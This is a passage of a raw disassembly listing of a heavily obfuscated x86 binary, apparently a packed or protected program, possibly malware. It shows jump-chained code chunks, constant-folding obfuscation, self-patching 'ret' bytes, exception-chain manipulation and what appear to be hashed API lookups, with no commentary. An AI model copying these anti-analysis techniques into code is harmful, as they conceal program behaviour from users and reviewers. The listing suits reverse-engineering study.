; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4404C5:				; CODE XREF: k2vbe3.d:00441BD4j
					; sub_45A323-17D7Fj
		jnz	loc_452115
		jmp	loc_44BD31
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_4404D0	proc near		; DATA XREF: k2vbe3.d:0044B4F2o
		mov	edx, 1AE260E8h
		call	sub_45B20A
		push	eax
		ror	eax, 9
		mov	ds:dword_453CF4, eax
		retn
sub_4404D0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4454EF

loc_4404E5:				; CODE XREF: sub_4454EF-7479j
		jmp	loc_43D54B
; END OF FUNCTION CHUNK	FOR sub_4454EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_4404EA:				; CODE XREF: sub_440C94-3C25j
		jmp	loc_44C96D
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_4404EF:				; CODE XREF: sub_44C1BDj
		push	offset loc_4544D9
		jmp	nullsub_73
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------
		push	edx
		push	5A597338h
		pop	edx
		and	edx, 0B584660h
		rol	edx, 5
		jmp	loc_44B094
; ---------------------------------------------------------------------------

loc_44050E:				; DATA XREF: sub_44FBDF-429Eo
		push	3D645CAh
		pop	esi
		rol	esi, 13h
		test	esi, 8000h
		jmp	loc_45403A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_299. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_440523:				; CODE XREF: sub_4575BD-F71Fj
		jmp	loc_44C349
; END OF FUNCTION CHUNK	FOR sub_4575BD
; ---------------------------------------------------------------------------

loc_440528:				; CODE XREF: k2vbe3.d:loc_43D721j
					; k2vbe3.d:0044E636j
		lea	edx, [ebp-14h]
		mov	eax, (offset aSCFEE3fD+3)
		call	sub_45B74D
		lea	eax, [ebp-14h]
		jmp	loc_444292
; ---------------------------------------------------------------------------

loc_44053D:				; CODE XREF: k2vbe3.d:00453928j
		or	ebp, 0FD26EB7Fh

; =============== S U B	R O U T	I N E =======================================



sub_440543	proc near		; CODE XREF: sub_458F37:loc_43F02Cp

; FUNCTION CHUNK AT 0043E12E SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044D813 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	ecx
		jmp	loc_44D813
sub_440543	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446964

loc_44054D:				; CODE XREF: sub_446964+482Bj
					; sub_446964:loc_44C1F2j
		call	sub_44B4E4
		mov	edx, 0BD91ED44h
		call	sub_45B20A

loc_44055C:				; CODE XREF: k2vbe3.d:loc_459159j
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+8+var_8]
		push	offset loc_44B4D5
		jmp	nullsub_426
; END OF FUNCTION CHUNK	FOR sub_446964
; ---------------------------------------------------------------------------

loc_44056C:				; CODE XREF: k2vbe3.d:00447CEFj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		call	sub_43D023
; START	OF FUNCTION CHUNK FOR sub_446478

loc_440578:				; CODE XREF: sub_446478+134ACj
		jmp	loc_44202C
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518A6

loc_44057D:				; CODE XREF: sub_4518A6+2F5Fj
		jmp	nullsub_162
; END OF FUNCTION CHUNK	FOR sub_4518A6
; ---------------------------------------------------------------------------

loc_440582:				; CODE XREF: k2vbe3.d:0043FCCFj
					; k2vbe3.d:0045B618j
		mov	eax, [edi]
		cmp	ebp, 0F923C562h
		jmp	loc_456090
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44058F:				; CODE XREF: sub_45A323:loc_451879j
		shl	ebx, 14h
		jmp	loc_43DC07
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_440597:				; CODE XREF: sub_43FE2A:loc_4475B9j
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_43FE2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_440599:				; CODE XREF: sub_442DF0+D5B6j
					; sub_442DF0+E707j
		mov	eax, ds:dword_441228
		mov	al, [eax]
		jmp	loc_44CB9D
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449FE9

loc_4405A5:				; CODE XREF: sub_449FE9:loc_4553C6j
		mov	eax, 0CB39536Bh
		push	ecx
		push	offset loc_44206C
		jmp	loc_442305
; END OF FUNCTION CHUNK	FOR sub_449FE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4469E1

loc_4405B5:				; CODE XREF: sub_4469E1:loc_446AC0j
		sbb	edi, ebp
		xchg	edx, [edi]
		adc	edx, 541646A1h
		jmp	loc_459C98
; END OF FUNCTION CHUNK	FOR sub_4469E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_4405C4:				; CODE XREF: sub_454E69-9306j
		jnz	loc_4586F2
		jmp	loc_4445AA
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_4405CF:				; CODE XREF: sub_45B74D-1EDFDj
		call	sub_4541EC

loc_4405D4:				; CODE XREF: k2vbe3.d:0045272Bj
		jmp	loc_454EEC
; END OF FUNCTION CHUNK	FOR sub_45B74D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D45F

loc_4405D9:				; CODE XREF: sub_43D45F+BF4Cj
		jmp	loc_44FED4
; END OF FUNCTION CHUNK	FOR sub_43D45F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447383

loc_4405DE:				; CODE XREF: sub_447383:loc_44035Ej
		add	eax, 5C1C72F8h
		add	eax, ebp
		add	eax, 0A9BDEF13h
		mov	eax, [eax]
		push	ecx
		push	eax
		jmp	loc_45A4E7
; END OF FUNCTION CHUNK	FOR sub_447383

; =============== S U B	R O U T	I N E =======================================



sub_4405F5	proc near		; CODE XREF: sub_457D11+2572p
					; k2vbe3.d:0045A6FDj
		xchg	esi, [esp+0]
		pop	esi
		xor	eax, 758E2FA8h
		push	offset sub_44CAB1
		jmp	nullsub_491
sub_4405F5	endp

; ---------------------------------------------------------------------------

loc_440609:				; CODE XREF: k2vbe3.d:0044DDBFj
		jnb	loc_450BBE

loc_44060F:				; CODE XREF: k2vbe3.d:loc_455CB6j
		push	edx
		call	sub_457A23

loc_440615:				; CODE XREF: k2vbe3.d:00456F1Bj
		jmp	loc_43D4D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_44061A:				; CODE XREF: sub_440D7B-615j
		jmp	nullsub_314
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------

loc_44061F:				; CODE XREF: k2vbe3.d:0044EB16j
		mov	ebp, esi

; =============== S U B	R O U T	I N E =======================================



sub_440621	proc near		; CODE XREF: sub_443FC1-1362p

; FUNCTION CHUNK AT 004406A1 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00441C13 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044479F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446BAF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B2D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F8FA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A171 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		inc	dword ptr [ebp-4]
		cmp	dword ptr [ebp-4], 100h
		jmp	loc_45A171
sub_440621	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		ja	loc_448F01
		jmp	sub_4515E7
; ---------------------------------------------------------------------------

loc_44063F:				; DATA XREF: k2vbe3.d:00445600o
		push	esi
		push	63ACD319h
		sbb	esi, 215193C6h
		jmp	loc_442322
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44803D

loc_440650:				; CODE XREF: sub_44803D:loc_44BF87j
		mov	eax, 0B98DBDD7h
		call	sub_4553CC

loc_44065A:				; CODE XREF: sub_44ED3C-FCB6j
		mov	ds:off_41E0A4, eax
		lea	eax, sub_44803D
		mov	byte ptr [eax],	0C3h
		jmp	sub_44803D
; ---------------------------------------------------------------------------

loc_44066E:				; CODE XREF: sub_44803D+33F7j
		mov	eax, [esp+0]
		jmp	loc_44AE67
; END OF FUNCTION CHUNK	FOR sub_44803D
; ---------------------------------------------------------------------------

loc_440676:				; CODE XREF: k2vbe3.d:00449380j
		ja	loc_443860

; =============== S U B	R O U T	I N E =======================================



sub_44067C	proc near		; CODE XREF: sub_4408BD+6p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CEAF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E41A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004403F9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443DF6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448CE6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D9F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EE27 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00451D08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F5C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045957A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00459D09 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045B922 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045C16C SIZE 00000013 BYTES

		xchg	esi, [esp+0]

loc_44067F:				; CODE XREF: k2vbe3.d:loc_44E63Bj
		pop	esi
		xchg	ecx, [esp+0]
		mov	ebx, ecx
		pop	ecx
		jmp	loc_43CEAF
sub_44067C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_44068B:				; CODE XREF: sub_444966:loc_454431j
		push	edx
		call	sub_455F6B
		push	9B9208Eh
		adc	eax, 0EC40517h
		jmp	loc_43FBC0
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440621

loc_4406A1:				; CODE XREF: sub_440621+F2DFj
		jnp	loc_4597B4
		shr	ebp, 7
		sub	eax, 0B6339507h
		mov	eax, 34725458h
		jmp	loc_44479F
; END OF FUNCTION CHUNK	FOR sub_440621
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_4406BA:				; CODE XREF: sub_4424CF+CC4Fj
		and	ecx, 7
		mov	eax, 1
		call	sub_44D298

loc_4406C7:				; DATA XREF: sub_444BEA+1255Eo
		add	edx, ebp
		add	edx, 48D4B40Ah
		mov	edx, [edx]

loc_4406D1:				; CODE XREF: sub_446E24:loc_454C6Bj
		shr	edx, 3
		mov	ecx, ds:dword_43FA7C
		movzx	edx, byte ptr [ecx+edx]
		and	eax, edx
		jz	loc_449C0B
		jmp	loc_44E8B4
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------

loc_4406EB:				; CODE XREF: k2vbe3.d:loc_45B29Aj
		sub	edi, 0DB7C370Eh
		call	sub_43C1C5
; START	OF FUNCTION CHUNK FOR sub_43DDA1

loc_4406F6:				; CODE XREF: sub_43DDA1:loc_43DDB4j
		pop	edx
		or	edx, 0D7B3380Bh
		push	offset loc_44CA1A
		jmp	nullsub_27
; END OF FUNCTION CHUNK	FOR sub_43DDA1
; ---------------------------------------------------------------------------
		cmp	edx, 3F6FAE12h
		jmp	loc_43DF14
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_440712:				; CODE XREF: sub_44471B-2C6Fj
		add	dword ptr [ebp-8], 2
		jmp	loc_44A66E
; END OF FUNCTION CHUNK	FOR sub_44471B

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44071B	proc near		; CODE XREF: sub_44867C+4p
					; sub_4535BC+8p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 00446AE6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045688D SIZE 00000013 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		jmp	loc_446AE6
sub_44071B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_440726:				; CODE XREF: sub_44B979:loc_43FA68j
		jnz	loc_44C12C
		jmp	loc_447487
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------

loc_440731:				; CODE XREF: k2vbe3.d:loc_453BEAj
		test	ebx, 0EB7EB3C2h
		jmp	loc_4564F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_44073C:				; CODE XREF: sub_4460FD+2AC2j
		sub	ebp, 52527F7Eh
		jns	sub_445F6E

loc_440748:				; CODE XREF: k2vbe3.d:loc_443FE6j
		push	offset sub_43F5E6
		jmp	loc_45A28D
; END OF FUNCTION CHUNK	FOR sub_4460FD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_174. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453FF1

loc_440753:				; CODE XREF: sub_453FF1-16100j
		jmp	loc_43DBBE
; END OF FUNCTION CHUNK	FOR sub_453FF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_440758:				; CODE XREF: sub_440D7B:loc_4531A3j
		mov	ebx, eax
		xchg	ebx, [esp+0]
		ror	eax, 13h
		mov	ds:dword_43FA94, eax
		jmp	loc_44061A
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------
		adc	esi, 6917CE11h
		jmp	loc_44A866
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C7D

loc_440776:				; CODE XREF: sub_440C7D+E23j
		add	ebx, 0E533A4F8h
		xchg	ebx, [esp+0]
		jmp	loc_44A8AC
; END OF FUNCTION CHUNK	FOR sub_440C7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D942

loc_440784:				; CODE XREF: sub_43D942-141j
		push	536EF9BDh
		and	ebp, 0A4D551B3h
		shr	ebp, 1Fh
		add	ebp, 46FE2FB3h

loc_440798:				; CODE XREF: sub_43D942-148j
		xor	edx, 0F4FDBA01h
		sub	edx, 0CD8AA891h
		xor	edx, 2E55031Fh
		jmp	loc_4432AB
; END OF FUNCTION CHUNK	FOR sub_43D942
; ---------------------------------------------------------------------------

loc_4407AF:				; CODE XREF: k2vbe3.d:004558B3j
		jz	nullsub_103

; =============== S U B	R O U T	I N E =======================================



sub_4407B5	proc near		; CODE XREF: sub_44D594-639p
		xchg	edx, [esp+0]
		pop	edx
		call	sub_43FE2A
		or	eax, eax
		jnz	locret_4407CB

loc_4407C6:				; CODE XREF: sub_44D594-63Fj
		call	sub_4418B4

locret_4407CB:				; CODE XREF: sub_4407B5+Bj
		retn
sub_4407B5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DCC

loc_4407CC:				; CODE XREF: sub_441DCC+10j
		jmp	loc_443B8D
; END OF FUNCTION CHUNK	FOR sub_441DCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_4407D1:				; CODE XREF: sub_444B3E:loc_449C20j
		jl	loc_45B59C

loc_4407D7:				; CODE XREF: sub_44A0C1+1j
		jmp	loc_45B753
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
		popf
		jno	loc_44A2C7
		jmp	loc_45B59C
; ---------------------------------------------------------------------------

locret_4407E8:				; CODE XREF: k2vbe3.d:00448497j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45574A

loc_4407E9:				; CODE XREF: sub_45574A+10j
		jmp	loc_4453EC
; END OF FUNCTION CHUNK	FOR sub_45574A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499EC

loc_4407EE:				; CODE XREF: sub_4499EC+5E91j
		jmp	loc_43CA1A
; END OF FUNCTION CHUNK	FOR sub_4499EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_4407F3:				; CODE XREF: sub_4529E2-15E4Dj
					; sub_4486D7+Cj
		rol	eax, 1
		cmp	eax, 0B3162C7h
		jmp	loc_44B374
; END OF FUNCTION CHUNK	FOR sub_4486D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_440800:				; CODE XREF: sub_44F028:loc_443191j
					; sub_44F028-BE89j
		call	sub_458279

loc_440805:				; CODE XREF: k2vbe3.d:00452B66j
		jmp	loc_43DA83
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B19

loc_44080A:				; CODE XREF: sub_446B19+5j
		jmp	ds:off_41E1F8
; END OF FUNCTION CHUNK	FOR sub_446B19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456208

loc_440810:				; CODE XREF: sub_456208:loc_456216j
		jmp	loc_451384
; END OF FUNCTION CHUNK	FOR sub_456208
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452693

loc_440815:				; CODE XREF: sub_452693-140F5j
		jmp	nullsub_337
; END OF FUNCTION CHUNK	FOR sub_452693

; =============== S U B	R O U T	I N E =======================================



sub_44081A	proc near		; CODE XREF: sub_446B19p sub_44C366+Aj ...

; FUNCTION CHUNK AT 0043E415 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443450 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00457426 SIZE 0000000B BYTES

		jo	loc_457426
		call	sub_45BB88

loc_440825:				; CODE XREF: sub_449CAB+7BC8j
		jmp	nullsub_28
sub_44081A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E9F

loc_44082A:				; CODE XREF: sub_453E9F:loc_453EA4j
		mov	ecx, [edi]
		jmp	loc_4434F1
; END OF FUNCTION CHUNK	FOR sub_453E9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_440831:				; CODE XREF: sub_451EB7:loc_45694Ej
		cmp	edx, 0C31AF863h
		jmp	loc_44D044
; END OF FUNCTION CHUNK	FOR sub_451EB7

; =============== S U B	R O U T	I N E =======================================



sub_44083C	proc near		; CODE XREF: sub_44ABBB+2p
					; k2vbe3.d:0045074Cj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E083 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00441A74 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443376 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C3AA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044C8C8 SIZE 00000039 BYTES
; FUNCTION CHUNK AT 0045332F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455554 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00455999 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045611A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00456160 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A2C3 SIZE 0000000E BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	58EB37DDh
		pop	edx
		xor	edx, 0F58FE3CBh
		add	edx, 6202C769h

loc_440852:				; CODE XREF: k2vbe3.d:loc_459F7Dj
		jmp	loc_443376
sub_44083C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	ecx, 9B7AF6B1h
		pushf
		jmp	sub_449A11

; =============== S U B	R O U T	I N E =======================================



sub_440863	proc near		; DATA XREF: sub_4418B4o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044B36A SIZE 00000004 BYTES

		push	ebx
		push	ecx
		call	sub_45814D
		mov	esp, [esp+4+arg_0]

loc_44086E:				; CODE XREF: sub_44866A-7579j
					; sub_44866A-756Ej ...
		xor	eax, eax

loc_440870:				; CODE XREF: sub_44866A-7566j
					; sub_44866A-7196j
		pop	large dword ptr	fs:0
		jmp	loc_44B36A
sub_440863	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_40. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_44087D:				; CODE XREF: sub_44416D-447Cj
		jmp	loc_454452
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4537C9

loc_440882:				; CODE XREF: sub_4537C9:loc_450A20j
		push	0E43AC992h
		pop	eax
		xor	eax, 6386CB42h
		push	offset loc_4576CD
		jmp	nullsub_142
; END OF FUNCTION CHUNK	FOR sub_4537C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_440898:				; CODE XREF: sub_4582DD+2831j
		jz	loc_44C7F8
		jmp	loc_455D39
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_4408A3:				; CODE XREF: sub_442DF0:loc_4503C0j
		or	esi, 84AD2BE3h
		rol	esi, 15h
		sub	esi, 4A191C77h
		add	esi, 0ABDD387h
		jmp	loc_454BC9
; END OF FUNCTION CHUNK	FOR sub_442DF0

; =============== S U B	R O U T	I N E =======================================



sub_4408BD	proc near		; CODE XREF: k2vbe3.d:loc_453EF1j
					; DATA XREF: sub_4518A6+2F5Ao

; FUNCTION CHUNK AT 00449F22 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044AAC2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044C89F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CF25 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044D156 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FE52 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459DC7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A5C2 SIZE 00000017 BYTES

		push	ebx
		push	9336CDB1h
		call	sub_44067C

loc_4408C8:				; CODE XREF: sub_44FA5A-94j
		or	esi, ebp
		jmp	loc_459DC7
sub_4408BD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4408CF:				; CODE XREF: sub_45A323:loc_45A377j
		or	esi, 83810976h
		js	loc_4549B6
		sbb	ebp, 0B89C9C96h
		rol	edi, 1Ah
		xchg	ecx, eax
		add	ebx, 8D9A6A73h
		jmp	loc_44F0DA
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_4408F1:				; CODE XREF: sub_44B94B+831Cj
		or	eax, edi
		jmp	loc_45571B
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4408F8:				; CODE XREF: sub_45A323:loc_457556j
		cmp	dword ptr [ebp-4], 4
		jnz	loc_45571B
		jmp	loc_44B48A
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_440907:				; CODE XREF: sub_43FA2C:loc_441778j
					; k2vbe3.d:loc_457259j
		push	offset loc_441AC9
		jmp	loc_454652
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447EB8

loc_440911:				; CODE XREF: sub_447EB8+CA08j
		call	sub_44DC2C
; END OF FUNCTION CHUNK	FOR sub_447EB8
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_440916:				; CODE XREF: sub_44ED3C-21Bj
		jmp	loc_443537
; END OF FUNCTION CHUNK	FOR sub_44ED3C

; =============== S U B	R O U T	I N E =======================================



sub_44091B	proc near		; DATA XREF: sub_4440CA:loc_445F11o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00454ABB SIZE 00000005 BYTES

		push	esi
		push	335F9E0Dh
		xchg	ebp, [esp+8+var_8]
		mov	esi, ebp
		pop	ebp
		sub	esi, 31F89468h
		xor	esi, 16709A5h
		jmp	loc_454ABB
sub_44091B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C1C5

loc_440938:				; CODE XREF: sub_43C1C5:loc_456300j
		push	359844EEh
		pop	eax
		xor	eax, 489295E4h
		or	eax, 5A377C34h
		sub	eax, 11EE48Eh
		rol	eax, 1Ah
; END OF FUNCTION CHUNK	FOR sub_43C1C5
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_440953:				; CODE XREF: sub_44CA34:loc_450D68j
		xor	eax, 0DAEE0307h
		add	eax, ebp

loc_44095B:				; CODE XREF: k2vbe3.d:loc_43F7E7j
		jmp	loc_44CFA7
; END OF FUNCTION CHUNK	FOR sub_44CA34
; ---------------------------------------------------------------------------

loc_440960:				; CODE XREF: k2vbe3.d:0043FD4Fj
		inc	ds:dword_44BCF8
		lea	eax, nullsub_11
		mov	byte ptr [eax],	0C3h
		push	esi
		push	0FF4439A1h
		jmp	loc_445042
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		call	sub_453347
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_440983:				; CODE XREF: sub_43D7A9+6j
		jmp	loc_44E0E0
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; ---------------------------------------------------------------------------
dword_440988	dd 4983F5D1h		; DATA XREF: sub_45000F:loc_458777r
; ---------------------------------------------------------------------------
		call	sub_4559F4
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E0EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507E3

loc_440997:				; CODE XREF: sub_4507E3+14j
		jmp	loc_43D3EB
; END OF FUNCTION CHUNK	FOR sub_4507E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_44099C:				; CODE XREF: sub_43DA1E+EF22j
		jmp	loc_446346
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440CA

loc_4409A1:				; CODE XREF: sub_4440CA+77C1j
		jnz	loc_445F11
		jmp	loc_453D18
; END OF FUNCTION CHUNK	FOR sub_4440CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_4409AC:				; CODE XREF: sub_43DFE1:loc_44103Aj
		push	7F51ABDEh
		pop	edi
		add	edi, 11BC4DBEh
		xor	edi, 0B8D04A0Fh
		or	edi, 2A3DA2A7h
		add	edi, 380FBEE9h
		add	eax, edi
		jmp	loc_4513AD
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------

loc_4409D1:				; CODE XREF: k2vbe3.d:loc_442618j
		or	eax, edx

; =============== S U B	R O U T	I N E =======================================



sub_4409D3	proc near		; CODE XREF: k2vbe3.d:004401F5p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00451D28 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_451D28
sub_4409D3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_4409DF:				; CODE XREF: sub_441885:loc_4479C5j
		jnz	loc_44DE18
		jmp	loc_44A34B
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451759

loc_4409EA:				; CODE XREF: sub_451759-FF62j
		add	esi, 6A07DC8Ch
		sub	ecx, 0DF2C0FC9h
		or	eax, ebx

loc_4409F8:				; CODE XREF: sub_451759:loc_459FC7j
		push	offset sub_4484A9
		jmp	loc_43EA38
; END OF FUNCTION CHUNK	FOR sub_451759
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_440A02:				; CODE XREF: sub_43CCD0+1590Fj
		cmp	eax, 0C3C033h
		jnz	loc_4556DD
		jmp	loc_451B08
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4523BE

loc_440A12:				; CODE XREF: sub_4523BE+6A2Fj
		mov	eax, [esp+0]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+4+var_4]
		jmp	loc_447604
; END OF FUNCTION CHUNK	FOR sub_4523BE
; ---------------------------------------------------------------------------

loc_440A20:				; CODE XREF: k2vbe3.d:loc_45B421j
		jnz	loc_446289
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_440A26:				; CODE XREF: sub_440CEA+F5C0j
		jmp	loc_44DEF4
